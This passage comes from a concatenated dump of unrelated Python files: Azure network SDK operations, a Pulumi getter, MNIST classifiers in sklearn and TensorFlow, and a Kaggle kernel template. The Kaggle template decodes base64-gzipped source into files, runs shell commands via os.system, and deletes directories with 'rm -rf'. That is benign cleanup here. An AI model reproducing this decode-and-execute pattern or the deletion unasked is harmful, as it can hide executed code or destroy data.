begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ExpressRoutePorts/{expressRoutePortName}'} # type: ignore
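    # Minimal usage sketch (illustrative only; the ExpressRoutePort fields
    # shown here are an assumption about the model, not taken from this file):
    #
    #   port = models.ExpressRoutePort(
    #       location="westus",
    #       peering_location="Example-Peering-Location",
    #       bandwidth_in_gbps=100)
    #   poller = network_client.express_route_ports.begin_create_or_update(
    #       "my-rg", "my-port", port)
    #   created = poller.result()  # deserialized ExpressRoutePort on success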
def _update_tags_initial(
self,
resource_group_name, # type: str
express_route_port_name, # type: str
parameters, # type: "models.TagsObject"
**kwargs # type: Any
):
# type: (...) -> "models.ExpressRoutePort"
cls = kwargs.pop('cls', None) # type: ClsType["models.ExpressRoutePort"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-08-01"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._update_tags_initial.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'expressRoutePortName': self._serialize.url("express_route_port_name", express_route_port_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(parameters, 'TagsObject')
body_content_kwargs['content'] = body_content
request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('ExpressRoutePort', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_update_tags_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ExpressRoutePorts/{expressRoutePortName}'} # type: ignore
def begin_update_tags(
self,
resource_group_name, # type: str
express_route_port_name, # type: str
parameters, # type: "models.TagsObject"
**kwargs # type: Any
):
# type: (...) -> LROPoller["models.ExpressRoutePort"]
"""Update ExpressRoutePort tags.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param express_route_port_name: The name of the ExpressRoutePort resource.
:type express_route_port_name: str
:param parameters: Parameters supplied to update ExpressRoutePort resource tags.
:type parameters: ~azure.mgmt.network.v2019_08_01.models.TagsObject
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:paramtype polling: bool or ~azure.core.polling.PollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of LROPoller that returns either ExpressRoutePort or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[~azure.mgmt.network.v2019_08_01.models.ExpressRoutePort]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["models.ExpressRoutePort"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._update_tags_initial(
resource_group_name=resource_group_name,
express_route_port_name=express_route_port_name,
parameters=parameters,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
deserialized = self._deserialize('ExpressRoutePort', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_update_tags.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ExpressRoutePorts/{expressRoutePortName}'} # type: ignore
def list_by_resource_group(
self,
resource_group_name, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["models.ExpressRoutePortListResult"]
"""List all the ExpressRoutePort resources in the specified resource group.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ExpressRoutePortListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2019_08_01.models.ExpressRoutePortListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.ExpressRoutePortListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-08-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list_by_resource_group.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('ExpressRoutePortListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_by_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/ExpressRoutePorts'} # type: ignore
def list(
self,
**kwargs # type: Any
):
# type: (...) -> Iterable["models.ExpressRoutePortListResult"]
"""List all the ExpressRoutePort resources in the specified subscription.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ExpressRoutePortListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2019_08_01.models.ExpressRoutePortListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.ExpressRoutePortListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-08-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('ExpressRoutePortListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Network/ExpressRoutePorts'} # type: ignore
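# ------------------------------------------------------------------------------
# Paging usage sketch (illustrative only; `network_client` stands for an
# instantiated azure.mgmt.network management client, which this module never
# creates). Both list() and list_by_resource_group() return an ItemPaged
# iterator that lazily follows `next_link`, so callers simply iterate:
#
#   for port in network_client.express_route_ports.list():
#       print(port.name)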
# ==============================================================================
# File: /argus-freesound-master/stacking_kernel_template.py
# (repo: Ramstein/castme-transform-prediction-via-adversarial-network, MIT)
# ==============================================================================
import gzip
import base64
import os
from pathlib import Path
from typing import Dict
KERNEL_MODE = "predict"
# Mapping of file path -> gzip-compressed, base64-encoded source code.
# "{file_data}" below is a template placeholder that is substituted when the
# kernel script is generated; the line is not valid Python until then.
file_data: Dict = {file_data}
for path, encoded in file_data.items():
print(path)
path = Path(path)
path.parent.mkdir(parents=True, exist_ok=True)
path.write_bytes(gzip.decompress(base64.b64decode(encoded)))
def run(command):
os.system('export PYTHONPATH=${PYTHONPATH}:/kaggle/working && '
f'export MODE={KERNEL_MODE} && ' + command)
run('python stacking_predict.py')
run('rm -rf argus src')
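# ------------------------------------------------------------------------------
# A minimal sketch of the inverse operation: how a generator script could build
# the `file_data` mapping substituted into this template. The helper name
# `encode_file_data` is hypothetical (it is not part of the original repo); it
# simply mirrors the gzip.decompress(base64.b64decode(...)) decoding above.
def encode_file_data(paths):
    """Return {path: base64(gzip(file bytes))} for the given source files."""
    encoded = {}
    for p in paths:
        raw = Path(p).read_bytes()  # Path is imported at the top of this file
        encoded[p] = base64.b64encode(gzip.compress(raw)).decode("ascii")
    return encoded
# Example call (hypothetical file list):
#   file_data = encode_file_data(["src/predictor.py", "stacking_predict.py"])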
# ==============================================================================
# File: /sdk/python/pulumi_azure_native/automation/v20190601/get_watcher.py
# (repo: MisinformedDNA/pulumi-azure-native, BSD-3-Clause / Apache-2.0)
# ==============================================================================
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
__all__ = [
'GetWatcherResult',
'AwaitableGetWatcherResult',
'get_watcher',
]
@pulumi.output_type
class GetWatcherResult:
"""
Definition of the watcher type.
"""
def __init__(__self__, creation_time=None, description=None, etag=None, execution_frequency_in_seconds=None, id=None, last_modified_by=None, last_modified_time=None, location=None, name=None, script_name=None, script_parameters=None, script_run_on=None, status=None, tags=None, type=None):
if creation_time and not isinstance(creation_time, str):
raise TypeError("Expected argument 'creation_time' to be a str")
pulumi.set(__self__, "creation_time", creation_time)
if description and not isinstance(description, str):
raise TypeError("Expected argument 'description' to be a str")
pulumi.set(__self__, "description", description)
if etag and not isinstance(etag, str):
raise TypeError("Expected argument 'etag' to be a str")
pulumi.set(__self__, "etag", etag)
if execution_frequency_in_seconds and not isinstance(execution_frequency_in_seconds, float):
raise TypeError("Expected argument 'execution_frequency_in_seconds' to be a float")
pulumi.set(__self__, "execution_frequency_in_seconds", execution_frequency_in_seconds)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if last_modified_by and not isinstance(last_modified_by, str):
raise TypeError("Expected argument 'last_modified_by' to be a str")
pulumi.set(__self__, "last_modified_by", last_modified_by)
if last_modified_time and not isinstance(last_modified_time, str):
raise TypeError("Expected argument 'last_modified_time' to be a str")
pulumi.set(__self__, "last_modified_time", last_modified_time)
if location and not isinstance(location, str):
raise TypeError("Expected argument 'location' to be a str")
pulumi.set(__self__, "location", location)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if script_name and not isinstance(script_name, str):
raise TypeError("Expected argument 'script_name' to be a str")
pulumi.set(__self__, "script_name", script_name)
if script_parameters and not isinstance(script_parameters, dict):
raise TypeError("Expected argument 'script_parameters' to be a dict")
pulumi.set(__self__, "script_parameters", script_parameters)
if script_run_on and not isinstance(script_run_on, str):
raise TypeError("Expected argument 'script_run_on' to be a str")
pulumi.set(__self__, "script_run_on", script_run_on)
if status and not isinstance(status, str):
raise TypeError("Expected argument 'status' to be a str")
pulumi.set(__self__, "status", status)
if tags and not isinstance(tags, dict):
raise TypeError("Expected argument 'tags' to be a dict")
pulumi.set(__self__, "tags", tags)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
@property
@pulumi.getter(name="creationTime")
def creation_time(self) -> str:
"""
Gets or sets the creation time.
"""
return pulumi.get(self, "creation_time")
@property
@pulumi.getter
def description(self) -> Optional[str]:
"""
Gets or sets the description.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter
def etag(self) -> Optional[str]:
"""
Gets or sets the etag of the resource.
"""
return pulumi.get(self, "etag")
@property
@pulumi.getter(name="executionFrequencyInSeconds")
def execution_frequency_in_seconds(self) -> Optional[float]:
"""
Gets or sets the frequency at which the watcher is invoked.
"""
return pulumi.get(self, "execution_frequency_in_seconds")
@property
@pulumi.getter
def id(self) -> str:
"""
Fully qualified resource Id for the resource
"""
return pulumi.get(self, "id")
@property
@pulumi.getter(name="lastModifiedBy")
def last_modified_by(self) -> str:
"""
Details of the user who last modified the watcher.
"""
return pulumi.get(self, "last_modified_by")
@property
@pulumi.getter(name="lastModifiedTime")
def last_modified_time(self) -> str:
"""
Gets or sets the last modified time.
"""
return pulumi.get(self, "last_modified_time")
@property
@pulumi.getter
def location(self) -> Optional[str]:
"""
The geo-location where the resource lives
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> str:
"""
The name of the resource
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="scriptName")
def script_name(self) -> Optional[str]:
"""
Gets or sets the name of the script the watcher is attached to, i.e. the name of an existing runbook.
"""
return pulumi.get(self, "script_name")
@property
@pulumi.getter(name="scriptParameters")
def script_parameters(self) -> Optional[Mapping[str, str]]:
"""
Gets or sets the parameters of the script.
"""
return pulumi.get(self, "script_parameters")
@property
@pulumi.getter(name="scriptRunOn")
def script_run_on(self) -> Optional[str]:
"""
Gets or sets the name of the hybrid worker group the watcher will run on.
"""
return pulumi.get(self, "script_run_on")
@property
@pulumi.getter
def status(self) -> str:
"""
Gets the current status of the watcher.
"""
return pulumi.get(self, "status")
@property
@pulumi.getter
def tags(self) -> Optional[Mapping[str, str]]:
"""
Resource tags.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> str:
"""
The type of the resource.
"""
return pulumi.get(self, "type")
class AwaitableGetWatcherResult(GetWatcherResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetWatcherResult(
creation_time=self.creation_time,
description=self.description,
etag=self.etag,
execution_frequency_in_seconds=self.execution_frequency_in_seconds,
id=self.id,
last_modified_by=self.last_modified_by,
last_modified_time=self.last_modified_time,
location=self.location,
name=self.name,
script_name=self.script_name,
script_parameters=self.script_parameters,
script_run_on=self.script_run_on,
status=self.status,
tags=self.tags,
type=self.type)
def get_watcher(automation_account_name: Optional[str] = None,
resource_group_name: Optional[str] = None,
watcher_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetWatcherResult:
"""
Definition of the watcher type.
:param str automation_account_name: The name of the automation account.
:param str resource_group_name: Name of an Azure Resource group.
:param str watcher_name: The watcher name.
"""
__args__ = dict()
__args__['automationAccountName'] = automation_account_name
__args__['resourceGroupName'] = resource_group_name
__args__['watcherName'] = watcher_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-native:automation/v20190601:getWatcher', __args__, opts=opts, typ=GetWatcherResult).value
return AwaitableGetWatcherResult(
creation_time=__ret__.creation_time,
description=__ret__.description,
etag=__ret__.etag,
execution_frequency_in_seconds=__ret__.execution_frequency_in_seconds,
id=__ret__.id,
last_modified_by=__ret__.last_modified_by,
last_modified_time=__ret__.last_modified_time,
location=__ret__.location,
name=__ret__.name,
script_name=__ret__.script_name,
script_parameters=__ret__.script_parameters,
script_run_on=__ret__.script_run_on,
status=__ret__.status,
tags=__ret__.tags,
type=__ret__.type)
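# ------------------------------------------------------------------------------
# Usage sketch (illustrative only; resource names are placeholders). Inside a
# Pulumi program, get_watcher resolves an existing watcher at deployment time:
#
#   watcher = get_watcher(
#       automation_account_name="my-automation-account",
#       resource_group_name="my-rg",
#       watcher_name="my-watcher")
#   pulumi.export("watcherStatus", watcher.status)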
# ==============================================================================
# File: /HW2/test-svm.py (repo: yshsu0918/MachineLearning2020)
# ==============================================================================
from sklearn import svm
import numpy as np
import struct
import time
def decode_idx3_ubyte(idx3_ubyte_file,dataset_size):
f = open(idx3_ubyte_file, 'rb').read()
mem_offset = 16
images = []
for i in range(dataset_size):
if (i+1) % (dataset_size/100) == 0:
print('#', end='')
images.append( np.array(struct.unpack_from('>784B', f, mem_offset)).reshape((28, 28)))
mem_offset += (784)
return images
def decode_idx1_ubyte(idx1_ubyte_file,dataset_size):
f = open(idx1_ubyte_file, 'rb').read()
mem_offset = 8
labels = []
for i in range(dataset_size):
if (i+1) % (dataset_size/100) == 0:
print('#', end='')
labels.append( struct.unpack_from('>B', f, mem_offset)[0] )
mem_offset += 1
return labels
train_image = decode_idx3_ubyte('train-images.idx3-ubyte',60000)
train_label = decode_idx1_ubyte('train-labels.idx1-ubyte',60000)
print('load train done')
test_image = decode_idx3_ubyte('t10k-images.idx3-ubyte',10000)
test_label = decode_idx1_ubyte('t10k-labels.idx1-ubyte',10000)
print('load test done')
#mnist = input_data.read_data_sets('MNIST_data', one_hot=False)
train_num = 60000
test_num = 10000
x_train = [ x.reshape(28*28) for x in train_image]
y_train = train_label
x_test = [ x.reshape(28*28) for x in test_image]
y_test = test_label
tStart = time.time()
# Build a support vector machine model (training capped at 1000 iterations).
print('building model')
predictor = svm.SVC(kernel='linear', verbose=True, max_iter=1000)
# Feed in the training data.
print('fitting')
predictor.fit(x_train[:train_num], y_train[:train_num])
# Predict on the test set.
print('predicting')
result = predictor.predict(x_test[:test_num])
# Estimate the accuracy.
print('scoring')
accuracy = np.sum(np.equal(result, y_test[:test_num])) / test_num
print(accuracy)
tEnd = time.time()
print('SVM use {} seconds'.format(tEnd - tStart))
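# A slightly richer evaluation sketch (uses the arrays defined above;
# classification_report is a standard sklearn.metrics helper):
from sklearn.metrics import classification_report
print(classification_report(y_test[:test_num], result))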
# ==============================================================================
# File: /01-codes/tensorflow-master/tensorflow/models/image/mnist/convolutional.py
# (repo: QPanProjects/Surrogate-Model, Apache-2.0 / MIT)
# ==============================================================================
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Simple, end-to-end, LeNet-5-like convolutional MNIST model example.
This should achieve a test error of 0.7%. Please keep this model as simple and
linear as possible, it is meant as a tutorial for simple convolutional models.
Run with --self_test on the command line to execute a short self-test.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import gzip
import os
import sys
import time
import numpy
import tensorflow as tf
from six.moves import urllib
from six.moves import xrange # pylint: disable=redefined-builtin
SOURCE_URL = 'http://yann.lecun.com/exdb/mnist/'
WORK_DIRECTORY = 'data'
IMAGE_SIZE = 28
NUM_CHANNELS = 1
PIXEL_DEPTH = 255
NUM_LABELS = 10
VALIDATION_SIZE = 5000 # Size of the validation set.
SEED = 66478 # Set to None for random seed.
BATCH_SIZE = 64
NUM_EPOCHS = 10
EVAL_BATCH_SIZE = 64
EVAL_FREQUENCY = 100 # Number of steps between evaluations.
tf.app.flags.DEFINE_boolean("self_test", False, "True if running a self test.")
FLAGS = tf.app.flags.FLAGS
def maybe_download(filename):
"""Download the data from Yann's web, unless it's already here."""
if not tf.gfile.Exists(WORK_DIRECTORY):
tf.gfile.MakeDirs(WORK_DIRECTORY)
filepath = os.path.join(WORK_DIRECTORY, filename)
if not tf.gfile.Exists(filepath):
filepath, _ = urllib.request.urlretrieve(SOURCE_URL + filename, filepath)
with tf.gfile.GFile(filepath) as f:
size = f.Size()
print('Successfully downloaded', filename, size, 'bytes.')
return filepath
def extract_data(filename, num_images):
"""Extract the images into a 4D tensor [image index, y, x, channels].
Values are rescaled from [0, 255] down to [-0.5, 0.5].
"""
print('Extracting', filename)
with gzip.open(filename) as bytestream:
bytestream.read(16)
buf = bytestream.read(IMAGE_SIZE * IMAGE_SIZE * num_images)
data = numpy.frombuffer(buf, dtype=numpy.uint8).astype(numpy.float32)
data = (data - (PIXEL_DEPTH / 2.0)) / PIXEL_DEPTH
data = data.reshape(num_images, IMAGE_SIZE, IMAGE_SIZE, 1)
return data
def extract_labels(filename, num_images):
"""Extract the labels into a vector of int64 label IDs."""
print('Extracting', filename)
with gzip.open(filename) as bytestream:
bytestream.read(8)
buf = bytestream.read(1 * num_images)
labels = numpy.frombuffer(buf, dtype=numpy.uint8).astype(numpy.int64)
return labels
def fake_data(num_images):
"""Generate a fake dataset that matches the dimensions of MNIST."""
data = numpy.ndarray(
shape=(num_images, IMAGE_SIZE, IMAGE_SIZE, NUM_CHANNELS),
dtype=numpy.float32)
labels = numpy.zeros(shape=(num_images,), dtype=numpy.int64)
for image in xrange(num_images):
label = image % 2
data[image, :, :, 0] = label - 0.5
labels[image] = label
return data, labels
def error_rate(predictions, labels):
"""Return the error rate based on dense predictions and sparse labels."""
return 100.0 - (
100.0 *
numpy.sum(numpy.argmax(predictions, 1) == labels) /
predictions.shape[0])
def main(argv=None): # pylint: disable=unused-argument
if FLAGS.self_test:
print('Running self-test.')
train_data, train_labels = fake_data(256)
validation_data, validation_labels = fake_data(EVAL_BATCH_SIZE)
test_data, test_labels = fake_data(EVAL_BATCH_SIZE)
num_epochs = 1
else:
# Get the data.
train_data_filename = maybe_download('train-images-idx3-ubyte.gz')
train_labels_filename = maybe_download('train-labels-idx1-ubyte.gz')
test_data_filename = maybe_download('t10k-images-idx3-ubyte.gz')
test_labels_filename = maybe_download('t10k-labels-idx1-ubyte.gz')
# Extract it into numpy arrays.
train_data = extract_data(train_data_filename, 60000)
train_labels = extract_labels(train_labels_filename, 60000)
test_data = extract_data(test_data_filename, 10000)
test_labels = extract_labels(test_labels_filename, 10000)
# Generate a validation set.
validation_data = train_data[:VALIDATION_SIZE, ...]
validation_labels = train_labels[:VALIDATION_SIZE]
train_data = train_data[VALIDATION_SIZE:, ...]
train_labels = train_labels[VALIDATION_SIZE:]
num_epochs = NUM_EPOCHS
train_size = train_labels.shape[0]
# This is where training samples and labels are fed to the graph.
# These placeholder nodes will be fed a batch of training data at each
# training step using the {feed_dict} argument to the Run() call below.
train_data_node = tf.placeholder(
tf.float32,
shape=(BATCH_SIZE, IMAGE_SIZE, IMAGE_SIZE, NUM_CHANNELS))
train_labels_node = tf.placeholder(tf.int64, shape=(BATCH_SIZE,))
eval_data = tf.placeholder(
tf.float32,
shape=(EVAL_BATCH_SIZE, IMAGE_SIZE, IMAGE_SIZE, NUM_CHANNELS))
# The variables below hold all the trainable weights. They are passed an
  # initial value which will be assigned when we call:
# {tf.initialize_all_variables().run()}
conv1_weights = tf.Variable(
tf.truncated_normal([5, 5, NUM_CHANNELS, 32], # 5x5 filter, depth 32.
stddev=0.1,
seed=SEED))
conv1_biases = tf.Variable(tf.zeros([32]))
conv2_weights = tf.Variable(
tf.truncated_normal([5, 5, 32, 64],
stddev=0.1,
seed=SEED))
conv2_biases = tf.Variable(tf.constant(0.1, shape=[64]))
fc1_weights = tf.Variable( # fully connected, depth 512.
tf.truncated_normal(
[IMAGE_SIZE // 4 * IMAGE_SIZE // 4 * 64, 512],
stddev=0.1,
seed=SEED))
fc1_biases = tf.Variable(tf.constant(0.1, shape=[512]))
fc2_weights = tf.Variable(
tf.truncated_normal([512, NUM_LABELS],
stddev=0.1,
seed=SEED))
fc2_biases = tf.Variable(tf.constant(0.1, shape=[NUM_LABELS]))
# We will replicate the model structure for the training subgraph, as well
# as the evaluation subgraphs, while sharing the trainable parameters.
def model(data, train=False):
"""The Model definition."""
# 2D convolution, with 'SAME' padding (i.e. the output feature map has
# the same size as the input). Note that {strides} is a 4D array whose
# shape matches the data layout: [image index, y, x, depth].
conv = tf.nn.conv2d(data,
conv1_weights,
strides=[1, 1, 1, 1],
padding='SAME')
# Bias and rectified linear non-linearity.
relu = tf.nn.relu(tf.nn.bias_add(conv, conv1_biases))
# Max pooling. The kernel size spec {ksize} also follows the layout of
# the data. Here we have a pooling window of 2, and a stride of 2.
pool = tf.nn.max_pool(relu,
ksize=[1, 2, 2, 1],
strides=[1, 2, 2, 1],
padding='SAME')
conv = tf.nn.conv2d(pool,
conv2_weights,
strides=[1, 1, 1, 1],
padding='SAME')
relu = tf.nn.relu(tf.nn.bias_add(conv, conv2_biases))
pool = tf.nn.max_pool(relu,
ksize=[1, 2, 2, 1],
strides=[1, 2, 2, 1],
padding='SAME')
# Reshape the feature map cuboid into a 2D matrix to feed it to the
# fully connected layers.
pool_shape = pool.get_shape().as_list()
reshape = tf.reshape(
pool,
[pool_shape[0], pool_shape[1] * pool_shape[2] * pool_shape[3]])
# Fully connected layer. Note that the '+' operation automatically
# broadcasts the biases.
hidden = tf.nn.relu(tf.matmul(reshape, fc1_weights) + fc1_biases)
# Add a 50% dropout during training only. Dropout also scales
# activations such that no rescaling is needed at evaluation time.
if train:
hidden = tf.nn.dropout(hidden, 0.5, seed=SEED)
return tf.matmul(hidden, fc2_weights) + fc2_biases
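  # Shape walkthrough for the default 28x28 input (derived from the layer
  # definitions above): conv1 with 'SAME' padding keeps 28x28x32, pool1 halves
  # it to 14x14x32, conv2 keeps 14x14x64, pool2 halves it to 7x7x64, and the
  # flatten step yields 7*7*64 = 3136 features -- matching the fc1 weight shape
  # IMAGE_SIZE // 4 * IMAGE_SIZE // 4 * 64.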
# Training computation: logits + cross-entropy loss.
logits = model(train_data_node, True)
loss = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(
logits, train_labels_node))
# L2 regularization for the fully connected parameters.
regularizers = (tf.nn.l2_loss(fc1_weights) + tf.nn.l2_loss(fc1_biases) +
tf.nn.l2_loss(fc2_weights) + tf.nn.l2_loss(fc2_biases))
# Add the regularization term to the loss.
loss += 5e-4 * regularizers
# Optimizer: set up a variable that's incremented once per batch and
# controls the learning rate decay.
batch = tf.Variable(0)
# Decay once per epoch, using an exponential schedule starting at 0.01.
learning_rate = tf.train.exponential_decay(
0.01, # Base learning rate.
batch * BATCH_SIZE, # Current index into the dataset.
train_size, # Decay step.
0.95, # Decay rate.
staircase=True)
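  # Worked example of the schedule: with staircase=True the rate drops by a
  # factor of 0.95 once per epoch, i.e. lr = 0.01 * 0.95**epoch, so
  # epoch 0 -> 0.0100, epoch 1 -> 0.0095, epoch 5 -> ~0.0077.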
# Use simple momentum for the optimization.
optimizer = tf.train.MomentumOptimizer(learning_rate,
0.9).minimize(loss,
global_step=batch)
# Predictions for the current training minibatch.
train_prediction = tf.nn.softmax(logits)
# Predictions for the test and validation, which we'll compute less often.
eval_prediction = tf.nn.softmax(model(eval_data))
# Small utility function to evaluate a dataset by feeding batches of data to
# {eval_data} and pulling the results from {eval_predictions}.
# Saves memory and enables this to run on smaller GPUs.
def eval_in_batches(data, sess):
"""Get all predictions for a dataset by running it in small batches."""
size = data.shape[0]
if size < EVAL_BATCH_SIZE:
raise ValueError("batch size for evals larger than dataset: %d" % size)
predictions = numpy.ndarray(shape=(size, NUM_LABELS), dtype=numpy.float32)
for begin in xrange(0, size, EVAL_BATCH_SIZE):
end = begin + EVAL_BATCH_SIZE
if end <= size:
predictions[begin:end, :] = sess.run(
eval_prediction,
feed_dict={eval_data: data[begin:end, ...]})
else:
batch_predictions = sess.run(
eval_prediction,
feed_dict={eval_data: data[-EVAL_BATCH_SIZE:, ...]})
predictions[begin:, :] = batch_predictions[begin - size:, :]
return predictions
# Create a local session to run the training.
start_time = time.time()
with tf.Session() as sess:
# Run all the initializers to prepare the trainable parameters.
tf.initialize_all_variables().run()
print('Initialized!')
# Loop through training steps.
for step in xrange(int(num_epochs * train_size) // BATCH_SIZE):
# Compute the offset of the current minibatch in the data.
# Note that we could use better randomization across epochs.
offset = (step * BATCH_SIZE) % (train_size - BATCH_SIZE)
batch_data = train_data[offset:(offset + BATCH_SIZE), ...]
batch_labels = train_labels[offset:(offset + BATCH_SIZE)]
# This dictionary maps the batch data (as a numpy array) to the
    # node in the graph it should be fed to.
feed_dict = {train_data_node: batch_data,
train_labels_node: batch_labels}
# Run the graph and fetch some of the nodes.
_, l, lr, predictions = sess.run(
